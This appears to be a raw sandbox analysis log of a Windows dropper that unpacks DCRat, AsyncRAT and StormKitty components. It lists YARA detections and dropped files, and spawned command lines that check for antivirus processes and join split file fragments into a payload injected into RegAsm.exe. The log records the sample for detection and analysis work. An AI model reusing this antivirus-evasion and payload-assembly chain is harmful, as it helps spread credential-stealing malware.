                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Hollow entropy: 7.99685426093Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Assume entropy: 7.99763847749Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Wallpapers entropy: 7.99799189457Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Specialist entropy: 7.99728573595Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Scottish entropy: 7.9980673954Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Reflected entropy: 7.99680752846Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Respondent entropy: 7.99841111859Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Crm entropy: 7.99834438399Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Spelling entropy: 7.99753094835Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Harassment entropy: 7.99810730566Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Usc entropy: 7.99792599778Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Tft entropy: 7.99754854098Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Specialties entropy: 7.99641949893Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Holocaust entropy: 7.99842487997Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Started entropy: 7.9971176372Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Angle entropy: 7.99700636245Jump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\585711\Y entropy: 7.99993092407Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.99661776995Jump to dropped file

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeCode function: 14_2_031A2F28 NtProtectVirtualMemory,14_2_031A2F28
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeCode function: 14_2_031A3368 NtProtectVirtualMemory,14_2_031A3368
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Windows\QueensFaJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Windows\JewelChicksJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Windows\AmountsBarbadosJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_0040737E0_2_0040737E
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_00406EFE0_2_00406EFE
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_004079A20_2_004079A2
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_004049A80_2_004049A8
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeCode function: 14_2_031A27A014_2_031A27A0
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeCode function: 14_2_031A2F2814_2_031A2F28
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeCode function: 14_2_031A279214_2_031A2792
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeCode function: 14_2_031A2F1914_2_031A2F19
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeCode function: 14_2_0702747014_2_07027470
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeCode function: 14_2_0702004014_2_07020040
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\585711\Depression.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: String function: 004062CF appears 57 times
                    Source: OR8Ti8rf8h.exeStatic PE information: invalid certificate
                    Source: OR8Ti8rf8h.exe, 00000000.00000003.1382590181.00000000006D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs OR8Ti8rf8h.exe
                    Source: OR8Ti8rf8h.exe, 00000000.00000002.1383805544.00000000006D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs OR8Ti8rf8h.exe
                    Source: OR8Ti8rf8h.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@24/54@2/1
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\7n5rJCiEX08cdKRQsT6vxkbuaZJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\sG6azeDqzAFWWzxp9qZPJ97vp0eOvHiiJkwqHSTMMTX+wLYD0aKplTVFwtlxkuJivPu7A2SLy039QhNNHaUMKTmGkVQbC2G64/H+EO3TbCY=
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsv2D05.tmpJump to behavior
                    Source: OR8Ti8rf8h.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: tasklist.exe, 00000004.00000002.1409294507.0000000003390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process"";
                    Source: OR8Ti8rf8h.exeReversingLabs: Detection: 21%
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile read: C:\Users\user\Desktop\OR8Ti8rf8h.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\OR8Ti8rf8h.exe "C:\Users\user\Desktop\OR8Ti8rf8h.exe"
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 585711
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "ComplyFailuresGuardsDomInvolvementRadarScreensKidney" Tonight
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Solaris + ..\Harassment + ..\Proudly + ..\Turned + ..\Viruses + ..\Wallpapers + ..\Usc + ..\Crm + ..\Ribbon + ..\Confident + ..\Angle + ..\Alumni + ..\Fees + ..\Reserve + ..\Reflected + ..\Include + ..\Specialist + ..\Respondent + ..\False + ..\Assume + ..\Regardless + ..\Mary + ..\Consecutive + ..\Movers + ..\Scottish + ..\Holocaust + ..\Experience + ..\Phrase + ..\Started + ..\Disturbed + ..\Needle + ..\Pipes + ..\Hollow + ..\Spelling + ..\Reed + ..\Tft + ..\Specialties Y
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\585711\Depression.com Depression.com Y
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comProcess created: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmdJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 585711Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "ComplyFailuresGuardsDomInvolvementRadarScreensKidney" Tonight Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Solaris + ..\Harassment + ..\Proudly + ..\Turned + ..\Viruses + ..\Wallpapers + ..\Usc + ..\Crm + ..\Ribbon + ..\Confident + ..\Angle + ..\Alumni + ..\Fees + ..\Reserve + ..\Reflected + ..\Include + ..\Specialist + ..\Respondent + ..\False + ..\Assume + ..\Regardless + ..\Mary + ..\Consecutive + ..\Movers + ..\Scottish + ..\Holocaust + ..\Experience + ..\Phrase + ..\Started + ..\Disturbed + ..\Needle + ..\Pipes + ..\Hollow + ..\Spelling + ..\Reed + ..\Tft + ..\Specialties YJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\585711\Depression.com Depression.com YJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comProcess created: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comSection loaded: wshbth.dllJump to behavior
